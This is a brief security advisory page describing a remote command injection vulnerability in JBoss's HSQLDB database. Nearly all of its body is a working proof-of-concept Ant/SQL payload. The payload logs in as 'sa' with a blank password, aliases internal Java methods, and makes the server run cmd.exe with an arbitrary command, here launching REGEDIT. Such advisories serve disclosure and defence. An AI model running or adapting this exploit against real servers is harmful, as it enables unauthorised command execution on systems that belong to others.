|
|
JBoss HSQLDB Remote Command Injection Vulnerability
The researchers who discovered this vulnerability have developed a working exploit that is not publicly available or known to be circulating in the wild. The following proof of concept is available: <target name="cmdinject"> <sql classpath="hsqldb.jar" driver="org.hsqldb.jdbcDriver" url="jdbc:hsqldb:hsql://${host}:${port}" userid="sa" password="" print = "true" > CREATE ALIAS COMPDEBUG FOR "org.apache.xml.utils.synthetic.JavaUtils.setDebug" CREATE ALIAS SETPROP FOR "java.lang.System.setProperty"; CREATE ALIAS COMPILE FOR "org.apache.xml.utils.synthetic.JavaUtils.JDKcompile"; CALL COMPDEBUG(true); CALL SETPROP('org.apache.xml.utils.synthetic.javac','cmd.exe'); CALL COMPILE('/c REGEDIT.EXE',''); </sql> </target> |
|
Privacy Statement |